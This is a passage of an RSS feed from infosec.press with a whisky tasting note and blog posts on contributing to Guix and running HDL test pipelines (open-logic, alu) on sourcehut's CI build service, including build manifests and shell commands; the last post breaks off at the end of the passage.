      <description>&lt;![CDATA[I&#39;ve been recently enjoying Mashbuild (https://www.washmodistilling.com/mashbuild), a whisky blended over in Washington, MO. It&#39;s a bit of a gimmick, but it&#39;s a tasty gimmick. Think &#34;Infinity Bottle&#34;, but at the barrel-level.&#xA;&#xA;It&#39;s a 100 proof whisky that&#39;s fairly dark. It&#39;s not as fiery as those that have aged for a long time. I find it smooth enough to enjoy with just a splash of water--I also have it with ice.&#xA;&#xA;On the nose I get leather with hints of cinnamon stick and honey. There&#39;s some heat mid-tongue and with greater heat at the throat. Honey and cinnamon with a brief hint of licorice or anise. The mouth feel is great, almost like coffee with cream.&#xA;&#xA;There are some other flavors in there, but I&#39;m not able to pick them out at the moment.&#xA;&#xA;I like this.&#xA;&#xA;I&#39;ll update when I put ice in the next dram.&#xA;&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<p>I&#39;ve been recently enjoying Mashbuild (<a href="https://www.washmodistilling.com/mashbuild" rel="nofollow">https://www.washmodistilling.com/mashbuild</a>), a whisky blended over in Washington, MO. It&#39;s a bit of a gimmick, but it&#39;s a tasty gimmick. Think “Infinity Bottle”, but at the barrel-level.</p>

<p>It&#39;s a 100 proof whisky that&#39;s fairly dark. It&#39;s not as fiery as those that have aged for a long time. I find it smooth enough to enjoy with just a splash of water—I also have it with ice.</p>

<p>On the nose I get leather with hints of cinnamon stick and honey. There&#39;s some heat mid-tongue and with greater heat at the throat. Honey and cinnamon with a brief hint of licorice or anise. The mouth feel is great, almost like coffee with cream.</p>

<p>There are some other flavors in there, but I&#39;m not able to pick them out at the moment.</p>

<p>I like this.</p>

<p>I&#39;ll update when I put ice in the next dram.</p>
]]></content:encoded>
      <author>beverageNotes</author>
      <guid>https://infosec.press/read/a/6ukw4gibar</guid>
      <pubDate>Sat, 21 Dec 2024 00:53:42 +0000</pubDate>
    </item>
    <item>
      <title>sourcehut as guix test farm</title>
      <link>https://infosec.press/csantosb/sourcehut-as-guix-test-farm</link>
      <description>&lt;![CDATA[img br/&#xA;It is possible to contribute to improving #guix as the need for new functionalities, packages, fixes or upgrades arise. This is one of the strongest points in open communities: the possibility to participate on the development and continuous improvement of the tool. Let’s see how it goes when it comes to guix.!--more-- br/&#xA;Guix is a huge project which follows closely the #freesoftware paradigm, and collaboration works in two directions. You take advantage of other developers contributions to guix, while you participate yourself to improving guix repositories with your fixes, updates or new features, once they have been tested. In a first approach, from my own experience, one may create a personal local repository of package definitions, for a personal use. As a second step, it is possible to create a public guix channel, in parallel to contributing upstream. br/&#xA;Contributing your code to guix comes to sending #email with your patches attached, it’s that simple. Don&#39;t be intimidated by the details (this is used by lots of open communities, after all). Once your patches are submitted, a review of your code follows, see details. Some tools, like mumi, are helpful to that purpose. br/&#xA;&#xA;In detail&#xA;&#xA;Following the kind of contribution (new additions, fixes or upgrades), these simple steps will allow you to start contributing to guix: br/&#xA;&#xA;    git clone guix itselft br/&#xA;    from the guix repository, do: br/&#xA;    &#xA;        guix shell -D guix -CPW&#xA;    ./bootstrap&#xA;    ./configure&#xA;    make -j$(nproc)&#xA;    ./pre-inst-env guix build hello&#xA;        add and commit your changes, watch the commit message br/&#xA;    beware your synopses and descriptions br/&#xA;    remember to run the package tests, if relevant br/&#xA;    check the license br/&#xA;    use an alphabetical order in input lists br/&#xA;    no sign off your commits br/&#xA;    don’t forget to use lint/style/refresh -l/dependents to check your code br/&#xA;&#xA;Boring and routinary, right ? br/&#xA;&#xA;Use sourcehut&#xA;&#xA;img br/&#xA;Most of all the of the previous can be run automatically with help of sourcehut build farm #ci capabilities. Just simply, push the guix repository to sr.ht. At this point, it is possible to use this manifest file to run the lint/style/refresh -l/dependents testing stages on the yosys package definition, por example: br/&#xA;&#xA;image: guix&#xA;shell: true&#xA;environment:&#xA;  prj: guix.guix&#xA;  cmd: &#34;guix shell -D guix -CPWN git nss-certs -- ./pre-inst-env guix&#34;&#xA;sources:&#xA;  https://git.sr.ht/~csantosb/guix.guix&#xA;tasks:&#xA;  defpkg: |&#xA;      cd &#34;$prj&#34;&#xA;      pkg=$(git log -1 --oneline | cut -d&#39;:&#39; -f 2 | xargs)&#xA;      echo &#34;export pkg=$pkg&#34;     &#34;$HOME/.buildenv&#34;&#xA;  setup: |&#xA;      cd &#34;$prj&#34;&#xA;      guix shell -D guix -CPW -- ./bootstrap&#xA;      guix shell -D guix -CPW -- ./configure&#xA;      guix shell -D guix -CPW -- make -j $(nproc)&#xA;  build: |&#xA;      cd &#34;$prj&#34;&#xA;      eval &#34;$cmd build --rounds=5 $pkg&#34;&#xA;  lint: |&#xA;      cd &#34;$prj&#34;&#xA;      eval &#34;$cmd lint $pkg&#34;&#xA;  style: |&#xA;      cd &#34;$prj&#34;&#xA;      eval &#34;$cmd style $pkg --dry-run&#34;&#xA;  refresh: |&#xA;      cd &#34;$prj&#34;&#xA;      eval &#34;$cmd refresh -l $pkg&#34;&#xA;  dependents: |&#xA;      cd &#34;$prj&#34;&#xA;      eval &#34;$cmd build --dependents $pkg&#34;&#xA;triggers:&#xA;  condition: failure&#xA;    action: email&#xA;    to: builds.sr.ht@csantosb.mozmail.com&#xA;&#xA;Submit the manifest with br/&#xA;&#xA;hut builds submit # --edit&#xA;&#xA;You’ll be able to log into the build farm to follow the build process or to debug it with br/&#xA;&#xA;hut builds ssh ID&#xA;&#xA;Check the log here. As you can see, it fails: building of yosys succeeds, but building of packages which depend on it (--dependents) fails. br/&#xA;&#xA;Advanced&#xA;&#xA;Sourcehut provides a facility to automatize patch submission and testing. Using its hub integrator, one may just send an email to the email list related to your project (guix in this case), which mimics guix behavior for accepting patches. br/&#xA;The trick here consists on appending the project name as a prefix to the subject of the message, for example PATCH project-name], which will trigger the build of previous [.build.yml manifest file at the root of the project, after applying the patch. Neat, right ? br/&#xA;If you followed right here, you’ll notice that previous build manifest file is monolithic, affecting always the same package (yosys), which is kind of useless, as we are here interested in testing our patch. Thus, the question on how to trigger a custom build containing an updated $pkg variable related to the patch to test remains open. br/&#xA;To update the contents of the $pkg variable in the build manifest, one has to parse the commit message in the patch, extracting from there the package name. This is not a problem, as guix imposes clear commit messages in patches, so typically something like br/&#xA;&#xA;gnu: gnunet: Update to 0.23.0&#xA;&#xA;or br/&#xA;&#xA;gnu: texmacs: Add qtwayland-5&#xA;&#xA;Hopefully, parsing these messages to get the package name, and so the value of $pkg is trivial. br/&#xA;Then, it remains to include in our build manifest a first task which updates the contents of &#34;$HOME/.buildenv&#34;. This file is automatically populated using the environment variables in the manifest, and its contents are sourced at the beginning of all tasks. This mechanism allows passing variables between tasks. br/&#xA;&#xA;echo &#34;export pkg=value&#34;     &#34;$HOME/.buildenv&#34;&#xA;&#xA;Send your contribution&#xA;&#xA;Finally, once your changes go through all the tests, br/&#xA;&#xA;    use git send-email to create and send a patch br/&#xA;    consider reviews, if any, updating your patch accordingly with git ammend br/&#xA;    resend a new patch including a patch version (v1, v2 ...) br/&#xA;&#xA;Interested ? Consult the documentation for details, you’ll learn a lot about how to contribute to a common good and collaboration with other people. br/&#xA;ciseries br/]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://git.sr.ht/~csantosb/blog.csantosb/blob/master/pics/guix.png" alt="img"> <br/>
It is possible to contribute to improving #guix as the need for new functionalities, packages, fixes or upgrades arise. This is one of the strongest points in open communities: the possibility to participate on the development and continuous improvement of the tool. Let’s see how it goes when it comes to <a href="https://guix.gnu.org/" rel="nofollow">guix</a>. <br/>
Guix is a huge project which follows closely the #freesoftware paradigm, and collaboration works in two directions. You take advantage of other developers contributions to guix, while you participate yourself to improving guix repositories with your fixes, updates or new features, once they have been tested. In a first approach, from my own experience, one may create a personal local repository of package definitions, for a personal use. As a second step, it is possible to create a public <a href="https://infosec.press/csantosb/guix-channels" rel="nofollow">guix channel</a>, in parallel to <a href="https://infosec.press/csantosb/guix-channels#contributing" rel="nofollow">contributing</a> upstream. <br/>
<a href="https://guix.gnu.org/manual/en/html_node/Contributing.html" rel="nofollow">Contributing</a> your code to guix comes to <a href="https://git-send-email.io/" rel="nofollow">sending #email</a> <a href="https://www.futurile.net/2022/03/07/git-patches-email-workflow/" rel="nofollow">with your patches</a> attached, it’s that simple. Don&#39;t be intimidated by the details (this is used by lots of open communities, after all). Once your patches are submitted, a review of your code follows, see <a href="https://libreplanet.org/wiki?title=Group:Guix/PatchReviewSessions2024" rel="nofollow">details</a>. Some tools, like <a href="https://www.youtube.com/watch?v=8m8igXrKaqU" rel="nofollow">mumi</a>, are helpful to that purpose. <br/></p>

<h1 id="in-detail">In detail</h1>

<p>Following the kind of contribution (new additions, fixes or upgrades), these simple steps will allow you to start contributing to guix: <br/></p>

<p>    git clone <a href="https://git.savannah.gnu.org/git/guix.git" rel="nofollow">guix itselft</a> <br/>
    from the guix repository, do: <br/></p>

<p>    <code>sh
    guix shell -D guix -CPW
    ./bootstrap
    ./configure
    make -j$(nproc)
    ./pre-inst-env guix build hello
</code>
    add and commit your changes, watch the commit message <br/>
    beware your <a href="https://guix.gnu.org/manual/en/html_node/Synopses-and-Descriptions.html" rel="nofollow">synopses and descriptions</a> <br/>
    remember to run the package tests, if relevant <br/>
    check the license <br/>
    use an alphabetical order in input lists <br/>
    no sign off your commits <br/>
    don’t forget to use <code>lint/style/refresh -l/dependents</code> to check your code <br/></p>

<p>Boring and routinary, right ? <br/></p>

<h1 id="use-sourcehut">Use sourcehut</h1>

<p><img src="https://git.sr.ht/~csantosb/blog.csantosb/blob/master/pics/sourcehut.png" alt="img"> <br/>
Most of all the of the previous can be run automatically with help of <a href="https://infosec.press/csantosb/tag:ciseries" rel="nofollow">sourcehut</a> build farm #ci capabilities. Just simply, push the guix repository to <a href="https://git.sr.ht/~csantosb/guix.guix" rel="nofollow">sr.ht</a>. At this point, it is possible to use <a href="https://builds.sr.ht/~csantosb/job/1391146/manifest" rel="nofollow">this manifest</a> file to run the <code>lint/style/refresh -l/dependents</code> testing stages on the <code>yosys</code> package definition, por example: <br/></p>

<pre><code class="language-yaml">image: guix
shell: true
environment:
  prj: guix.guix
  cmd: &#34;guix shell -D guix -CPWN git nss-certs -- ./pre-inst-env guix&#34;
sources:
  - https://git.sr.ht/~csantosb/guix.guix
tasks:
  - def_pkg: |
      cd &#34;$prj&#34;
      _pkg=$(git log -1 --oneline | cut -d&#39;:&#39; -f 2 | xargs)
      echo &#34;export pkg=$_pkg&#34; &gt;&gt; &#34;$HOME/.buildenv&#34;
  - setup: |
      cd &#34;$prj&#34;
      guix shell -D guix -CPW -- ./bootstrap
      guix shell -D guix -CPW -- ./configure
      guix shell -D guix -CPW -- make -j $(nproc)
  - build: |
      cd &#34;$prj&#34;
      eval &#34;$cmd build --rounds=5 $pkg&#34;
  - lint: |
      cd &#34;$prj&#34;
      eval &#34;$cmd lint $pkg&#34;
  - style: |
      cd &#34;$prj&#34;
      eval &#34;$cmd style $pkg --dry-run&#34;
  - refresh: |
      cd &#34;$prj&#34;
      eval &#34;$cmd refresh -l $pkg&#34;
  - dependents: |
      cd &#34;$prj&#34;
      eval &#34;$cmd build --dependents $pkg&#34;
triggers:
  - condition: failure
    action: email
    to: builds.sr.ht@csantosb.mozmail.com
</code></pre>

<p>Submit the manifest with <br/></p>

<pre><code class="language-sh">hut builds submit # --edit
</code></pre>

<p>You’ll be able to log into the build farm to follow the build process or to debug it with <br/></p>

<pre><code class="language-sh">hut builds ssh ID
</code></pre>

<p>Check the log <a href="https://builds.sr.ht/~csantosb/job/1391146" rel="nofollow">here</a>. As you can see, it fails: building of <code>yosys</code> succeeds, but building of packages which depend on it (<code>--dependents</code>) <a href="https://builds.sr.ht/~csantosb/job/1391146#task-dependents" rel="nofollow">fails</a>. <br/></p>

<h1 id="advanced">Advanced</h1>

<p>Sourcehut provides a facility to automatize <a href="https://man.sr.ht/builds.sr.ht/#integrations" rel="nofollow">patch submission and testing</a>. Using its <code>hub</code> integrator, one may just send an email to the email list related to your project (guix in this case), which mimics guix behavior for accepting patches. <br/>
The trick here consists on appending the project name as a prefix to the subject of the message, for example <code>[PATCH project-name]</code>, which will trigger the build of previous <a href="https://builds.sr.ht/~csantosb/job/1391146/manifest" rel="nofollow">.build.yml</a> manifest file at the root of the project, after applying the patch. Neat, right ? <br/>
If you followed right here, you’ll notice that previous build manifest file is monolithic, affecting always the same package (yosys), which is kind of useless, as we are here interested in testing our patch. Thus, the question on how to trigger a custom build containing an updated <code>$pkg</code> variable related to the patch to test remains open. <br/>
To update the contents of the <code>$pkg</code> variable in the build manifest, one has to parse the commit message in the patch, extracting from there the package name. This is not a problem, as guix imposes clear commit messages in patches, so typically something like <br/></p>

<pre><code class="language-sh">* gnu: gnunet: Update to 0.23.0
</code></pre>

<p>or <br/></p>

<pre><code class="language-sh">* gnu: texmacs: Add qtwayland-5
</code></pre>

<p>Hopefully, parsing these messages to get the package name, and so the value of <code>$pkg</code> is trivial. <br/>
Then, it remains to include in our build manifest a first task which updates the contents of <code>&#34;$HOME/.buildenv&#34;</code>. This file is automatically populated using the environment variables in the manifest, and its contents are sourced at the beginning of all tasks. This mechanism allows passing variables between tasks. <br/></p>

<pre><code class="language-sh">echo &#34;export pkg=value&#34; &gt;&gt; &#34;$HOME/.buildenv&#34;
</code></pre>

<h1 id="send-your-contribution">Send your contribution</h1>

<p>Finally, once your changes go through all the tests, <br/></p>

<p>    use <a href="https://git-send-email.io/" rel="nofollow">git send-email</a> to create and <a href="https://guix.gnu.org/manual/en/html_node/Submitting-Patches.html" rel="nofollow">send a patch</a> <br/>
    consider reviews, if any, updating your patch accordingly with <code>git ammend</code> <br/>
    resend a new patch including a patch version (v1, v2 ...) <br/></p>

<p>Interested ? Consult <a href="https://guix.gnu.org/manual/en/html_node/Contributing.html" rel="nofollow">the documentation</a> for details, you’ll learn a lot about how to contribute to a common good and collaboration with other people. <br/>
#ciseries <br/></p>
]]></content:encoded>
      <author>csantosb</author>
      <guid>https://infosec.press/read/a/ieu2zfw9rr</guid>
      <pubDate>Tue, 17 Dec 2024 16:57:05 +0000</pubDate>
    </item>
    <item>
      <title>ci (sourcehut): alu</title>
      <link>https://infosec.press/csantosb/ci-sourcehut-alu</link>
      <description>&lt;![CDATA[img br/&#xA;Remote #ci is the way to go in #modernhw digital design testing. In this #ciseries, let’s see how to implement it with detail using sourcehut and a real world example. !--more-- br/&#xA;Sourcehut is a lightweight #gitforge where I host my #git repositories. Not only it is based on a paradigm perfectly adapted to #modernhw, but also its builds service includes support for guix (x8664) images. This means that we will be able to execute all of our testing online inside guix profiles, shells or natively on top of the bare-bones image. br/&#xA;&#xA;Alu&#xA;&#xA;Let’s consider now a variant of the previous example with open-logic. Here, we concentrate on a toy design only for demonstration purposes, a dummy alu emulator, which uses #osvvm as verification framework and relies on a few #openlogic blocs. In this case, its dependencies are defined in a manifest.scm file, including both fw-open-logic and osvvm, among other dependencies. br/&#xA;Install dependencies locally, in a new profile with br/&#xA;&#xA;cd alu&#xA;mkdir deps&#xA;export GUIXPROFILE=open-logic/deps&#xA;guix install -P $GUIXPROFILE -m .builds/manifest.scm&#xA;. $GUIXPROFILE/etc/profile&#xA;&#xA;In this case, we will test the design using, first, a custom made makefile. Secondly, we will use hdlmake to automatically produce our makefile. Similarly to previous #openlogic example, two build manifest are used: br/&#xA;&#xA;    profile1 br/&#xA;    profile2 br/&#xA;&#xA;You’ll realise how some of the tasks are common with the case of previous #openlogic example (update channels, auth and update profile). br/&#xA;&#xA;osvvm&#xA;&#xA;In this case, we also need to compile osvvm libraries br/&#xA;&#xA;    compile\_osvvm, produce a compiled version of #osvvm verification libraries; this is necessary as we are using here the tcl  scripts included in the library itself to follow the correct order of compilation. Libraries will appear within the local profile under $GUIXPROFILE/VHDLLIBS/GHDL-X.Y.Z br/&#xA;&#xA;test&#xA;&#xA;    test, for a fully custom made testing pipeline; in this case, using a Makefile br/&#xA;    Just simply, source the .envrc file where the local $GUIXPROFILE variable is defined, cd to the ghdl directory and call make to compile the design and run the simulation in two steps: first, clean all and include sources in its corresponding libraries with br/&#xA;    &#xA;        make cleanall include&#xA;        &#xA;    Then, produce a new Makefile using ghdl. br/&#xA;    &#xA;        ./makefile.sh # ghdl --gen-makefile ...&#xA;        &#xA;    Finally, run the simulation with br/&#xA;    &#xA;        make GHDLRUNFLAGS=&#34;--stop-time=4us --disp-time --ieee-asserts=enable&#34; run&#xA;        &#xA;    This will produce a executable file before running it with the provided parameters. br/&#xA;    You may notice that, in this case, you need to produce somehow your own Makefile, or equivalent pipeline, right ? br/&#xA;&#xA;hdlmake&#xA;&#xA;Wouldn’t it be nice if we had a tool to deploy online which produces makefiles for us ? It exists, and its name is #hdlmake. br/&#xA;&#xA;    test\hdlmake br/&#xA;    Source the .envrc file where the local $GUIXPROFILE variable is defined, cd to the .builds/hdlmake directory where all Manifest.py files are located, and call hdlmake to produce the Makefile. Finally, just run make to compile the design, produce an executable and run it. br/&#xA;&#xA;Check the resulting logs inline here, for example. br/]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/sourcehut.png" alt="img"> <br/>
Remote #ci is the <a href="https://infosec.press/csantosb/tag:ciseries" rel="nofollow">way to go</a> in #modernhw digital design testing. In this #ciseries, let’s see how to implement it with detail using <a href="https://sourcehut.org/" rel="nofollow">sourcehut</a> and a real world example.  <br/>
<a href="https://infosec.press/csantosb/sourcehut-crash-course" rel="nofollow">Sourcehut</a> is a lightweight #gitforge where I host my #git repositories. Not only it is <a href="https://infosec.press/csantosb/git-forges#sourcehut" rel="nofollow">based on a paradigm</a> perfectly adapted to #modernhw, but also its <a href="https://infosec.press/csantosb/sourcehut-crash-course#builds" rel="nofollow">builds</a> service includes support for <a href="https://man.sr.ht/builds.sr.ht/compatibility.md#guix-system" rel="nofollow">guix</a> (x86_64) images. This means that we will be able to execute all of our testing online inside <a href="https://infosec.press/csantosb/guix-crash-course#profiles-and-generations" rel="nofollow">guix profiles</a>, <a href="https://infosec.press/csantosb/guix-crash-course#shell-containers" rel="nofollow">shells</a> or natively on top of the bare-bones image. <br/></p>

<h1 id="alu">Alu</h1>

<p>Let’s consider now a variant of the <a href="https://infosec.press/csantosb/ci-sourcehut" rel="nofollow">previous example with open-logic</a>. Here, we concentrate on a <a href="https://git.sr.ht/~csantosb/ip.alu/tree" rel="nofollow">toy design</a> only for demonstration purposes, a <a href="https://git.sr.ht/~csantosb/ip.alu/tree/master/item/src/alu.vhd" rel="nofollow">dummy alu emulator</a>, which uses #osvvm as verification framework and relies on a few #openlogic blocs. In this case, its dependencies are defined in a <a href="https://git.sr.ht/~csantosb/ip.alu/tree/test/item/.builds/manifest.scm" rel="nofollow">manifest.scm</a> file, including both <code>fw-open-logic</code> and <code>osvvm</code>, among other dependencies. <br/>
Install dependencies locally, in a new <a href="https://infosec.press/csantosb/guix-crash-course#profiles-and-generations" rel="nofollow">profile</a> with <br/></p>

<pre><code class="language-sh">cd alu
mkdir _deps
export GUIX_PROFILE=open-logic/_deps
guix install -P $GUIX_PROFILE -m .builds/manifest.scm
. $GUIX_PROFILE/etc/profile
</code></pre>

<p>In this case, we will test the design using, first, a custom made makefile. Secondly, we will use <a href="https://hdlmake.readthedocs.io/en/master/" rel="nofollow">hdlmake</a> to automatically produce our makefile. Similarly to <a href="https://infosec.press/csantosb/ci-sourcehut" rel="nofollow">previous</a> #openlogic example, two build manifest are used: <br/></p>

<p>    <a href="https://git.sr.ht/~csantosb/ip.alu/tree/test/item/.builds/profile1.yml" rel="nofollow">profile1</a> <br/>
    <a href="https://git.sr.ht/~csantosb/ip.alu/tree/test/item/.builds/profile2.yml" rel="nofollow">profile2</a> <br/></p>

<p>You’ll realise how some of the tasks are common with the case of previous #openlogic example (update channels, auth and update profile). <br/></p>

<h2 id="osvvm">osvvm</h2>

<p>In this case, we also need to compile osvvm libraries <br/></p>

<p>    <strong>compile__osvvm</strong>, <a href="https://builds.sr.ht/~csantosb/job/1389146#task-compile_osvvm" rel="nofollow">produce a compiled version</a> of #osvvm verification libraries; this is necessary as we are using here the <code>tcl</code>  scripts included in the library itself to follow the correct order of compilation. Libraries will appear within the local profile under <code>$GUIX_PROFILE/VHDL_LIBS/GHDL-X.Y.Z</code> <br/></p>

<h2 id="test">test</h2>

<p>    <strong>test</strong>, for a fully custom made testing pipeline; in this case, using a <code>Makefile</code> <br/>
    Just simply, source the <code>.envrc</code> file where the local <code>$GUIX_PROFILE</code> variable is defined, cd to the <code>ghdl</code> directory and call make to compile the design and run the simulation in two steps: first, clean all and include sources in its corresponding libraries with <br/></p>

<p>    <code>sh
    make __clean_all __include
</code></p>

<p>    Then, produce a new <code>Makefile</code> using <code>ghdl</code>. <br/></p>

<p>    <code>sh
    ./makefile.sh # ghdl --gen-makefile ...
</code></p>

<p>    Finally, run the simulation with <br/></p>

<p>    <code>sh
    make GHDLRUNFLAGS=&#34;--stop-time=4us --disp-time --ieee-asserts=enable&#34; run
</code></p>

<p>    This will produce a executable file before <a href="https://builds.sr.ht/~csantosb/job/1389146#task-test" rel="nofollow">running it</a> with the provided parameters. <br/>
    You may notice that, in this case, you need to produce somehow your own <code>Makefile</code>, or equivalent pipeline, right ? <br/></p>

<h2 id="hdlmake">hdlmake</h2>

<p>Wouldn’t it be nice if we had a tool to deploy online which produces makefiles for us ? It exists, and its name is #hdlmake. <br/></p>

<p>    <strong>test__hdlmake</strong> <br/>
    <a href="https://git.sr.ht/~csantosb/ip.alu/tree/8324cd0fcb838cfb8303aae9e668b6831a329cbb/.builds/profile1.yml#L39" rel="nofollow">Source</a> the <code>.envrc</code> file where the local <code>$GUIX_PROFILE</code> variable is defined, cd to the <code>.builds/hdlmake</code> directory where all <code>Manifest.py</code> files are located, and call <code>hdlmake</code> to produce the <code>Makefile</code>. Finally, just run make to compile the design, produce an executable and run it. <br/></p>

<p>Check the resulting logs inline <a href="https://builds.sr.ht/~csantosb/job/1389146#task-test_hdlmake" rel="nofollow">here</a>, for example. <br/></p>
]]></content:encoded>
      <author>csantosb</author>
      <guid>https://infosec.press/read/a/f5icu8byvz</guid>
      <pubDate>Fri, 13 Dec 2024 12:38:24 +0000</pubDate>
    </item>
    <item>
      <title>ci (sourcehut): open-logic</title>
      <link>https://infosec.press/csantosb/ci-sourcehut</link>
      <description>&lt;![CDATA[img br/&#xA;Remote #ci is the way to go in #modernhw digital design testing. In this #ciseries, let’s see how to implement it with detail using sourcehut and a real world example. !--more-- br/&#xA;Sourcehut is a lightweight #gitforge where I host my #git repositories. Not only it is based on a paradigm perfectly adapted to #modernhw, but also its builds service includes support for guix (x8664) images. This means that we will be able to execute all of our testing online inside guix profiles, shells or natively on top of the bare-bones image. br/&#xA;&#xA;Open logic&#xA;&#xA;Let’s see how in detail using the cookbook as a starting point, and taking as a complete example the fw-open-logic #openlogic firmware package which comes with the electronics guix channel. br/&#xA;Get it with: br/&#xA;&#xA;guix install fw-open-logic:out&#xA;&#xA;Open logic is a useful #vhdl library of commonly used components, implemented in a reusable and vendor/tool-independent way.  As any other #modernhw library, it includes tests sets for any of its components, using the vunit utility in this case. br/&#xA;To run the full tests suite use (user wide using the default $GUIXPROFILE), install its dependencies, defined in a manifest.scm file (ghdl-clang and python-vunit in this case). br/&#xA;&#xA;cd open-logic&#xA;guix install -m .builds/manifest.scm&#xA;cd sim&#xA;python3 run.py --ghdl -v&#xA;&#xA;or local to the project, using a profile br/&#xA;&#xA;cd open-logic&#xA;mkdir deps&#xA;export GUIXPROFILE=open-logic/deps&#xA;guix install -P $GUIXPROFILE -m .builds/manifest.scm&#xA;. $GUIXPROFILE/etc/profile&#xA;cd sim&#xA;python3 run.py --ghdl -v&#xA;&#xA;go remote&#xA;&#xA;img br/&#xA;Now, how do we proceed online using #sourcehut #ci builds facility ? Builds will pop up a new environment based on an up to date guix-system image when we push a commit to git.sr.ht, provided we include a .build.yml build manifest file, or by a .build folder with up to 4 build manifest files, at the root of the git project 1]. Be careful: consider that this image is [built daily using a crontab job, which is a good and a bad thing at the same time. From one side, you won’t be using the same environment for your tests, which breaks #reproducibility (see comments section below). On the other side, #guix is a rolling release, and new fancy features and new fixes are added every day. Keep this in mind. br/&#xA;Let’s create a .builds folder in a topic test branch, with the following contents: br/&#xA;&#xA;    manifest.scm, list of dependencies in our project br/&#xA;    guix.scm, default guix repository, redundant, included here for convenience br/&#xA;    channels.scm, list of guix channels remote repositories, in addition to the default guix repository, from where we pull packages br/&#xA;    We will be using here my own electronics channel (no substitutes), as well as the guix science channel (which provides substitutes). br/&#xA;    (note how here we load the local guix.scm file, instead of making use of the %default-channels global variable) br/&#xA;    &#xA;        (load &#34;guix.scm&#34;)&#xA;    ;;; %default-channels&#xA;        key.pub, auth key to access substitutes of packages in guix channels br/&#xA;&#xA;build manifests&#xA;&#xA;From now on, every new push to the test #git branch will trigger the execution of the tasks defined in the three build manifest files br/&#xA;&#xA;    profile1 br/&#xA;    profile2 br/&#xA;    shell1 br/&#xA;&#xA;The two profile build manifest files use a slightly different approach, and are given here for comparison purposes only. The shell build manifest uses an isolated shell container within the image itself to illustrate this feature. br/&#xA;Inside the manifests, I declare the image to use, guix, and the global environment variables sourced before each task is run: prj (project name), srv (list of servers with substitutes), manifest and channels (pointing to the corresponding files) and key (same). It is important to declare a trigger action, to receive an email with all relevant information in case of failure (log, id, commit, etc.). br/&#xA;&#xA;tasks&#xA;&#xA;What’s interesting here is the list of tasks. Some of them are common to all three manifests br/&#xA;&#xA;    env, useful only for debugging br/&#xA;    guix\updatechannels, replace the default project local guix.scm file by the output of br/&#xA;    &#xA;        guix describe --format=channels&#xA;        &#xA;    The goal here is avoid pulling latest guix upstream, useless and cpu and time consuming, and using the local version instead. Remember that the guix system image we are using here is updated daily. br/&#xA;    &#xA;        guix\auth, runs the authorize command to add the key.pub file to guix, so that we will be able to download package substitutes when necessary br/&#xA;        &#xA;                sudo guix archive --authorize &lt; &#34;$key&#34;&#xA;                &#xA;        Here, one may opt by doing a br/&#xA;        &#xA;                guix pull --channels=&#34;$channels&#34;&#xA;                &#xA;        as in profile2, to set the revision of the guix channels we are using (remember channels are nothing but git repositories). br/&#xA;        Note how in profile1 and shell1 we opt for a different approach. br/&#xA;        guix\updateprofile, where we create a deps folder to be used as a local $GUIXPROFILE (defined in .envrc). br/&#xA;        Then, one of br/&#xA;        &#xA;                # profile1&#xA;        guix time-machine --channels=&#34;$channels&#34; -- \&#xA;             package -p &#34;$GUIXPROFILE&#34; \&#xA;             --substitute-urls=&#34;$srv&#34; \&#xA;             -m &#34;$manifest&#34;&#xA;                &#xA;        or br/&#xA;        &#xA;                # profile2&#xA;        guix \&#xA;            package -p &#34;$GUIXPROFILE&#34; \&#xA;            --substitute-urls=&#34;$srv&#34; \&#xA;            -m &#34;$manifest&#34;&#xA;                &#xA;        will install packages in $manifest into the $GUIXPROFILE. I’m using here the time-machine mechanism to set the revision of the guix channels, depending if guix pull was run in the previous stage or not. br/&#xA;        vunit, sets env variables in .envrc and runs python3 run.py --ghdl -v inside sim directory br/&#xA;        Note that here, we are using ghdl-clang and python-vunit packages, provided respectively by guix-science and the electronics channel. br/&#xA;        guix\shelltest, used by shell1, make use of time-machine (no former guix pull, then), to create a shell container, where to install project dependencies. Then, if calls inmediately run.sh to run the unit tests br/&#xA;        &#xA;                guix time-machine --channels=&#34;$channels&#34; -- shell -C --substitute-urls=&#34;$srv&#34; -m &#34;$manifest&#34; -- ./.builds/run.sh&#xA;        &#xA;&#xA;comments&#xA;&#xA;You may check the logs of profile1, profile2 and shell1 manifests, including a section with logs per task, to better understand what’s going on here. Remember that #sourcehut gives ssh access to the builds by connecting to the runners in case of failures, which provides a practical way of debugging the manifest files. br/&#xA;You may see how, using the remove guix image, it is possible to deploy a series of tasks to test our #modernhw design as we develop it: we will get an email in case of failure to pass the tests. Here, I present three approaches: guix pulling to set the repositories revisions on use; time-machine, to achieve the same, and guix shell to create an isolated container. These three alternatives are not necessary here, of course, but are given as a simple and practical demo of what can be achieved with #guix, #sourcehut and #ci. br/&#xA;To conclude this long post, it is important to stress once again that the point on using #guix resides in its reproducibility capabilities. By keeping a couple of #plaintext files, namely the manifest.scm and channels.scm, one can obtain #determinism in the execution of the tests. Even if the guix image is upgraded and rebuilt daily (and so it changes), by fixing the revision of our channels (remember, guix pull or guix time-machine) we obtain always the same products out of our tests, as we run the same (project and tests) code, within exactly the same environment. br/&#xA;&#xA;---&#xA;&#xA;[1] It is also possible to automatically submit builds when a patch to a repo with build manifests is sent to a mailing list. This is achieved by appending the project name as a prefix to the subject of the message, for example [PATCH project-name]. br/]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/sourcehut.png" alt="img"> <br/>
Remote #ci is the <a href="https://infosec.press/csantosb/tag:ciseries" rel="nofollow">way to go</a> in #modernhw digital design testing. In this #ciseries, let’s see how to implement it with detail using <a href="https://sourcehut.org/" rel="nofollow">sourcehut</a> and a real world example.  <br/>
<a href="https://infosec.press/csantosb/sourcehut-crash-course" rel="nofollow">Sourcehut</a> is a lightweight #gitforge where I host my #git repositories. Not only it is <a href="https://infosec.press/csantosb/git-forges#sourcehut" rel="nofollow">based on a paradigm</a> perfectly adapted to #modernhw, but also its <a href="https://infosec.press/csantosb/sourcehut-crash-course#builds" rel="nofollow">builds</a> service includes support for <a href="https://man.sr.ht/builds.sr.ht/compatibility.md#guix-system" rel="nofollow">guix</a> (x86_64) images. This means that we will be able to execute all of our testing online inside <a href="https://infosec.press/csantosb/guix-crash-course#profiles-and-generations" rel="nofollow">guix profiles</a>, <a href="https://infosec.press/csantosb/guix-crash-course#shell-containers" rel="nofollow">shells</a> or natively on top of the bare-bones image. <br/></p>

<h1 id="open-logic">Open logic</h1>

